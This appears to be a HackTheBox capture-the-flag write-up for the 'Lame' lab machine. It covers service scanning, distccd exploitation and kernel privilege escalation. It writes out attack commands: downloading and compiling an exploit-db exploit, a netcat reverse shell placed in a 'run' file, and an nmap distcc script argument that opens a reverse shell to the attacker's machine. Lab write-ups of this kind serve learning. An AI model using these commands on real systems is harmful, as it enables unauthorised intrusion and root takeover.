HackTheBox - Lame write-up
This is an Easy box from HTB Labs. Lame is running multiple vulnerable services through which you can get access to the system. Lets start cracking!!!
Nmap Scanning Results
sudo map -sV -A 10.10.10.3
PORT | Status | SERVICE | VERSION
21/tcp|open | ftp |vsftpd 2.3.4
ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Host script results: | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: |_ Workgroup: WORKGROUP\x00
So theres is distccd 4.2.4, samba 3.0.20 service are running on the remote machine. After a quick search on Metasploit and Google found that both the services were vulnerble with public exploit available.
Exploitation (with Metasploit)
I was curious about this service from the start and wanted to dig more. distccd module is also available in metasploit so lets exploit. It worked but we got a limited shell meaning we are in as a daemon service not as root user/ standard user. Lets find a way to Privilege Escalate it.
to find out the linux kernel and os version running on the machine.
Remote server kernel running foudn to be vulnerable - linux 2.6.24-16-server
Now Download the Exploit to the local machine : COMMAND: wget http://www.exploit-db.com/download/8572 Move to “/var/www/html” and change permission. Open Apache web server on your local atacking machine COMMAND: service apache2 start Download exploit in remote machine /tmp folder and compile 8572.c COMMAND: gcc 8572.c -o exploit Now we need Create file “run” in tmp file as the exploit executes “run” file. COMMANDS: echo ‘#!/bin/bash’ > run echo ‘/bin/netcat -e /bin/bash 10.10.10.15 1234’ » run
Execute below to find pid of udevd COMMAND: cat /proc/net/netlink Start listener on local machine And execute exploit with pid of udevd. Got r00t!!!!
To test first we run COMMAND: nmap -p 3632 10.10.10.3 –script distcc-cve2004-2687.nse –script-args="distcc-cve2004-2687.cmd='id’” We got the uid and gid info back meaning this script is working. now we can go ahead and get root shell.
COMMAND: nmap -p 3632 10.10.10.3 –script distcc-cve2004-2687.nse –script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh 10.10.15.102 1234’” Now grab the flags.This was an easy and privilege escalation part was the interesting bit here.